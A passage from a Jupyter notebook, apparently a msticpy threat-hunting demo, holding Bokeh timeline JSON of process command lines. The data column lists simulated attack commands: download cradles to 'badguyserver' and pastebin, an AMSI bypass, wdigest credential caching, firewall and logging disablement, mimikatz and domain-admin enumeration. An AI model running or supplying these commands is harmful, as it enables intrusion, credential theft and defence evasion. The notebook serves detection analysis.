aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\n>> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"certutil -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"implant.exe k111\",\"implant.exe 81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe -b -t -m\",\"cmd /c \\\"echo Invoke-Expression Get-Process;\\nInvoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell -Noninteractive -Noprofile -Command\\n\\\"Invoke-Expression Get-Process; Invoke-WebRequest\\n-Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell Invoke-Shellcode.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell -command \\\"(New-Object\\nNet.WebClient).DownloadString(('ht'+'tp://pasteb'\\n+ 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1 localgroup\\nAdministrators\",\"whoami\",\"hostname\",\"netstat -an\",\"net user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user Bob1 /domain\",\"net user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user BobX /domain\",\"net group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Admins\\\"\\n/domain\",\".\\\\rUnDlL32 /C ShEll32Control_RanDLL.dll\",\".\\\\reg query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg add Image File Execution Options sethc.exe\",\".\\\\ftp -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg add\\n\\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal\\nServer\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d\\n0x1 /f\",\".\\\\reg add\\n\\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal\\nServer\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d\\n0x0 /f\",\"net use v: \\\\\\\\tsclient\\\\c\",\"net v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1 v: /delete\",\"cmd /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:Cre\\nateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe\\n-c \\\"\\\"$x=$((gp\\nHKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\nCertificate).Certificate);.\\\\powershell -E\\n$y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh advfirewall firewall add rule\\nname=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\app\\ndata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityprovi\\nders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"cmd /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"c:\\\\Windows\\\\System32\\\\svchost.exe -k malicious\",\"cmd.exe /c echo createobject\\\"msxml2.xmlhttp\\\")\",\"ASC_Alerttest_662jfi039n.exe -foo\",\".\\\\powershell.exe -command [ref].assembly.gettype\\n('http://system.management.automation.amsiutils').\\ngetfield('amsiinitfailed','nonpublic,static').setv\\nalue($null,$true)\\\\\\\"\",\"netsh start capture=yes IPv4.Address=1.2.3.4 trac\\nefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzz\\nzz.txt\",\".\\\\wuauclt.exe /C\\n\\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\".\\\\lsass.exe /C\\n\\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd /c \\\"powershell wscript.shell used to download\\na .gif\\\"\",\"cacls.exe c:\\\\windows\\\\system32\\\\wscript.exe /e /t\\n/g everyone:f\",\"cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\sys\\ntem32\\\\inetsrv\\\\appcmd set config \\\"Default Web\\nSite/\\\" /section:httplogging /dontLog:true&echo\\n[S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"cmd /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe firewall set\\nopmode mode=disable profile=all\",\"cmd /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe @ abc.com\\nabc.wallet\",\"cmd /c echo /e:vbscript.encode /b\",\"pcalua.exe -a \\\\\\\\server\\\\payload.dll\",\"findstr /si password sysvol *.txt\",\"odbcconf.exe /S /A {REGSVR C:\\\\Users\\\\Administrator\\n\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe 464 0 0x0110:40\",\"mt.exe port\",\"mt.exe smb\",\"hd.exe -pslist\",\"hd.exe -enum\",\"netsh.exe PortOpenning\",\"certutil -urlcache -split -f http://127.0.0.1/\",\".\\\\reg add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\nNT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\nNT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc create MSTICTestService binPath=C:\\\\Users\\\\MSTIC\\nA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test\\nService\\\"\",\"sc delete MSTICTestService\",\"cmd /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\reg.exe add \\\"hkcu\\\\console\\\" /v windowposition\\n/t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32 /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\"],\"TimeGenerated\":{\"__ndarray__\":\"AHB09v6EdkIAUHv2/oR2QgBAf/b+hHZCABCA9v6EdkIAAIP2/oR2QgDghPb+hHZCAPCF9v6EdkIAQIn2/oR2QgDgifb+hHZCAICK9v6EdkIAMI32/oR2QgBQkPb+hHZCAHCT9v6EdkIAUJT2/oR2QgAAl/b+hHZCAPCZ9v6EdkIAcJz2/oR2QgAgn/b+hHZCANCh9v6EdkIAcKb2/oR2QgDAqfb+hHZCAFCt9v6EdkIAcLD2/oR2QgAQsfb+hHZCABBB8/6EdkIA8Ezz/oR2QgCQTfP+hHZCAOBV8/6EdkIAIFfz/oR2QgDwXPP+hHZCANBd8/6EdkIAYHHz/oR2QgAwo/T+hHZCALAc9f6EdkIAsB31/oR2QgAwH/X+hHZCAKAg9f6EdkIAECL1/oR2QgBgPfX+hHZCAMBB9f6EdkIAMEf1/oR2QgBQS/X+hHZCAFBQ9f6EdkIAEFP1/oR2QgAQWPX+hHZCACCq9f6EdkIAEK31/oR2QgDQsfX+hHZCAMC09f6EdkIAULn1/oR2QgBAvPX+hHZCAHDA9f6EdkIAkMP1/oR2QgDwx/X+hHZCANDK9f6EdkIA0M71/oR2QgDw0fX+hHZCABDW9f6EdkIAMNn1/oR2QgAw3fX+hHZCABDg9f6EdkIAsOT1/oR2QgBwYfX+hHZCAJBl9f6EdkIAsGz1/oR2QgAwcPX+hHZCADB09f6EdkIAsHf1/oR2QgAAevX+hHZCAHB69f6EdkIAcHr1/oR2QgAQhfX+hHZCAJCI9f6EdkIAwIz1/oR2QgAQkPX+hHZCACCW9f6EdkIA4Jn1/oR2QgBAnvX+hHZCAPCk9f6EdkIAgDX2/oR2QgDwNvb+hHZCABA69v6EdkIAMD32/oR2QgBQP/b+hHZCAABH9v6EdkIAEEj2/oR2QgCwSfb+hHZCAMBK9v6EdkIAAEz2/oR2QgDQTPb+hHZCABBO9v6EdkIAIE/2/oR2QgBAUvb+hHZCANBV9v6EdkIA8Fj2/oR2QgAQXPb+hHZCADBf9v6EdkIAgGL2/oR2QgAwZfb+hHZCAOBm9v6EdkIA8Gf2/oR2QgBAa/b+hHZCADBu9v6EdkIAUHH2/oR2QgAQtvb+hHZCAEC29v6EdkIAkLj2/oR2QgAwv/b+hHZCACDC9v6EdkIAEMX2/oR2QgBQx/b+hHZCAADJ9v6EdkIAIMz2/oR2QgDAzPb+hHZCACDR9v6EdkIAAOz2/oR2QgAw8Pb+hHZCAGD19v6EdkIA8Pj2/oR2QgDA+fb+hHZCAAD79v6EdkIAEPz2/oR2QgAwAPf+hHZCACAD9/6EdkIAQAb3/oR2QgAwCff+hHZCAJAJ9/6EdkIAYA73/oR2QgDgEPf+hHZCADAT9/6EdkIAIBf3/oR2QgBAGvf+hHZCADAd9/6EdkIAUCD3/oR2QgBwI/f+hHZCACAm9/6EdkIAQCn3/oR2QgBwLff+hHZCAMAw9/6EdkIAcDP3/oR2QgCQOvf+hHZCALA+9/6EdkIAcEH3/oR2QgAgRPf+hHZCABBH9/6EdkIA8En3/oR2QgAQTPf+hHZCABDv9f6EdkIAQPP1/oR2QgDQ9vX+hHZCADD79f6EdkIAUP/1/oR2QgCQBPb+hHZCAFAJ9v6EdkIA0Av2/oR2QgAwEPb+hHZCAFAT9v6EdkIAABX2/oR2QgBQGPb+hHZCACAd9v6EdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[160]},\"index\":[46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,76,77,78,79,80,81,82,85,89,90,91,92,93,94,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,221,222,223,224,225,226,227,230,231,232,233,234,235],\"y_index\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]},\"selected\":{\"id\":\"4909\"},\"selection_policy\":{\"id\":\"4908\"}},\"id\":\"4810\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"below\":[{\"id\":\"4824\"}],\"center\":[{\"id\":\"4827\"},{\"id\":\"4831\"}],\"height\":300,\"left\":[{\"id\":\"4828\"},{\"id\":\"4897\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"4887\"},{\"id\":\"4894\"}],\"title\":{\"id\":\"4814\"},\"toolbar\":{\"id\":\"4838\"},\"width\":900,\"x_range\":{\"id\":\"4816\"},\"x_scale\":{\"id\":\"4820\"},\"y_range\":{\"id\":\"4818\"},\"y_scale\":{\"id\":\"4822\"}},\"id\":\"4813\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"align\":\"right\",\"coordinates\":null,\"group\":null,\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"4861\",\"type\":\"Title\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"4926\"},{\"id\":\"4927\"},{\"id\":\"4928\"},{\"id\":\"4929\"},{\"id\":\"4930\"},{\"id\":\"4931\"},{\"id\":\"4932\"},{\"id\":\"4933\"},{\"id\":\"4934\"},{\"id\":\"4935\"},{\"id\":\"4936\"},{\"id\":\"4937\"}]},\"id\":\"4857\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"Range Selector\"},\"id\":\"4846\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"4854\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"4852\",\"type\":\"LinearScale\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"4862\"},\"group\":null,\"major_label_policy\":{\"id\":\"4907\"},\"ticker\":{\"id\":\"4857\"}},\"id\":\"4856\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"axis\":{\"id\":\"4856\"},\"coordinates\":null,\"group\":null,\"ticker\":null},\"id\":\"4859\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"4902\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"active_multi\":{\"id\":\"4876\"},\"tools\":[{\"id\":\"4876\"}]},\"id\":\"4860\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"4903\",\"type\":\"AllLabels\"},{\"attributes\":{\"fill_color\":{\"value\":\"#440154\"},\"hatch_color\":{\"value\":\"#440154\"},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4865\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"4862\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#440154\"},\"hatch_alpha\":{\"value\":0.5},\"hatch_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4884\",\"type\":\"Scatter\"},{\"attributes\":{},\"id\":\"4905\",\"type\":\"AllLabels\"},{\"attributes\":{\"coordinates\":null,\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"group\":null,\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"4877\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"fill_color\":{\"value\":\"#FDE724\"},\"hatch_color\":{\"value\":\"#FDE724\"},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4871\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"#440154\"},\"hatch_alpha\":{\"value\":0.2},\"hatch_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4867\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"#FDE724\"},\"hatch_alpha\":{\"value\":0.2},\"hatch_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4873\",\"type\":\"Circle\"},{\"attributes\":{\"source\":{\"id\":\"4811\"}},\"id\":\"4875\",\"type\":\"CDSView\"},{\"attributes\":{\"overlay\":{\"id\":\"4877\"},\"x_range\":{\"id\":\"4816\"},\"y_range\":null},\"id\":\"4876\",\"type\":\"RangeTool\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"4811\"},\"glyph\":{\"id\":\"4871\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"4873\"},\"nonselection_glyph\":{\"id\":\"4872\"},\"view\":{\"id\":\"4875\"}},\"id\":\"4874\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"4810\"}},\"id\":\"4869\",\"type\":\"CDSView\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"4810\"},\"glyph\":{\"id\":\"4884\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"4886\"},\"nonselection_glyph\":{\"id\":\"4885\"},\"view\":{\"id\":\"4888\"}},\"id\":\"4887\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"4810\"},\"glyph\":{\"id\":\"4865\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"4867\"},\"nonselection_glyph\":{\"id\":\"4866\"},\"view\":{\"id\":\"4869\"}},\"id\":\"4868\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"hatch_alpha\":{\"value\":0.1},\"hatch_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4885\",\"type\":\"Scatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"#440154\"},\"hatch_alpha\":{\"value\":0.2},\"hatch_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4886\",\"type\":\"Scatter\"},{\"attributes\":{\"label\":{\"value\":\"MSTICAdmin\"},\"renderers\":[{\"id\":\"4887\"}]},\"id\":\"4889\",\"type\":\"LegendItem\"},{\"attributes\":{\"source\":{\"id\":\"4810\"}},\"id\":\"4888\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"hatch_alpha\":{\"value\":0.1},\"hatch_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4892\",\"type\":\"Scatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#FDE724\"},\"hatch_alpha\":{\"value\":0.5},\"hatch_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4891\",\"type\":\"Scatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"#FDE724\"},\"hatch_alpha\":{\"value\":0.2},\"hatch_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4893\",\"type\":\"Scatter\"},{\"attributes\":{\"click_policy\":\"hide\",\"coordinates\":null,\"group\":null,\"items\":[{\"id\":\"4896\"},{\"id\":\"4889\"}],\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"4897\",\"type\":\"Legend\"},{\"attributes\":{},\"id\":\"4907\",\"type\":\"AllLabels\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"TimeGenerated\",\"@TimeGenerated\"],[\"CommandLine\",\"@CommandLine\"]]},\"id\":\"4812\",\"type\":\"HoverTool\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"4811\"},\"glyph\":{\"id\":\"4891\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"4893\"},\"nonselection_glyph\":{\"id\":\"4892\"},\"view\":{\"id\":\"4895\"}},\"id\":\"4894\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"label\":{\"value\":\"MSTICAlertsWin1$\"},\"renderers\":[{\"id\":\"4894\"}]},\"id\":\"4896\",\"type\":\"LegendItem\"},{\"attributes\":{\"source\":{\"id\":\"4811\"}},\"id\":\"4895\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"4908\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"4909\",\"type\":\"Selection\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"hatch_alpha\":{\"value\":0.1},\"hatch_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4872\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"hatch_alpha\":{\"value\":0.1},\"hatch_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4866\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"4881\",\"type\":\"DatetimeTickFormatter\"}],\"root_ids\":[\"4898\"]},\"title\":\"Bokeh Application\",\"version\":\"2.4.2\"}};\n const render_items = [{\"docid\":\"c7dbd89b-c893-4780-9734-316224a29fae\",\"root_ids\":[\"4898\"],\"roots\":{\"4898\":\"892140f6-58a7-406a-8983-239be5d50b80\"}}];\n root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n }\n if (root.Bokeh !== undefined) {\n embed_document(root);\n } else {\n let attempts = 0;\n const timer = setInterval(function(root) {\n if (root.Bokeh !== undefined) {\n clearInterval(timer);\n embed_document(root);\n } else {\n attempts++;\n if (attempts > 100) {\n clearInterval(timer);\n console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n }\n }\n }, 10, root)\n }\n})(window);", "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "4898" } }, "output_type": "display_data" }, { "data": { "text/html": [ "
Column(
id = '4898', …)
align = 'start',
aspect_ratio = None,
background = None,
children = [Figure(id='4813', ...), Figure(id='4845', ...)],
css_classes = [],
disabled = False,
height = None,
height_policy = 'auto',
js_event_callbacks = {},
js_property_callbacks = {},
margin = (0, 0, 0, 0),
max_height = None,
max_width = None,
min_height = None,
min_width = None,
name = None,
rows = 'auto',
sizing_mode = None,
spacing = 0,
subscribed_events = [],
syncable = True,
tags = [],
visible = True,
width = None,
width_policy = 'auto')
\n", "\n" ], "text/plain": [ "Column(id='4898', ...)" ] }, "execution_count": 97, "metadata": {}, "output_type": "execute_result" } ], "source": [ "proc_df.mp_plot.timeline(group_by=\"SubjectUserName\", source_columns=[\"CommandLine\"])" ] }, { "cell_type": "code", "execution_count": 98, "metadata": {}, "outputs": [ { "data": { "text/html": [ "\n", "
\n", " \n", " Loading BokehJS ...\n", "
" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n const force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n const JS_MIME_TYPE = 'application/javascript';\n const HTML_MIME_TYPE = 'text/html';\n const EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n const CLASS_NAME = 'output_bokeh rendered_html';\n\n /**\n * Render data to the DOM node\n */\n function render(props, node) {\n const script = document.createElement(\"script\");\n node.appendChild(script);\n }\n\n /**\n * Handle when an output is cleared or removed\n */\n function handleClearOutput(event, handle) {\n const cell = handle.cell;\n\n const id = cell.output_area._bokeh_element_id;\n const server_id = cell.output_area._bokeh_server_id;\n // Clean up Bokeh references\n if (id != null && id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n\n if (server_id !== undefined) {\n // Clean up Bokeh references\n const cmd_clean = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n cell.notebook.kernel.execute(cmd_clean, {\n iopub: {\n output: function(msg) {\n const id = msg.content.text.trim();\n if (id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n }\n }\n });\n // Destroy server and session\n const cmd_destroy = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n cell.notebook.kernel.execute(cmd_destroy);\n }\n }\n\n /**\n * Handle when a new output is added\n */\n function handleAddOutput(event, handle) {\n const output_area = handle.output_area;\n const output = handle.output;\n\n // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n return\n }\n\n const toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n // store reference to embed id on output_area\n output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n }\n if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n const bk_div = document.createElement(\"div\");\n bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n const script_attrs = bk_div.children[0].attributes;\n for (let i = 0; i < script_attrs.length; i++) {\n toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n }\n // store reference to server id on output_area\n output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n }\n }\n\n function register_renderer(events, OutputArea) {\n\n function append_mime(data, metadata, element) {\n // create a DOM node to render to\n const toinsert = this.create_output_subarea(\n metadata,\n CLASS_NAME,\n EXEC_MIME_TYPE\n );\n this.keyboard_manager.register_events(toinsert);\n // Render to node\n const props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n render(props, toinsert[toinsert.length - 1]);\n element.append(toinsert);\n return toinsert\n }\n\n /* Handle when an output is cleared or removed */\n events.on('clear_output.CodeCell', handleClearOutput);\n events.on('delete.Cell', handleClearOutput);\n\n /* Handle when a new output is added */\n events.on('output_added.OutputArea', handleAddOutput);\n\n /**\n * Register the mime type and append_mime function with output_area\n */\n OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n /* Is output safe? */\n safe: true,\n /* Index of renderer in `output_area.display_order` */\n index: 0\n });\n }\n\n // register the mime type if in Jupyter Notebook environment and previously unregistered\n if (root.Jupyter !== undefined) 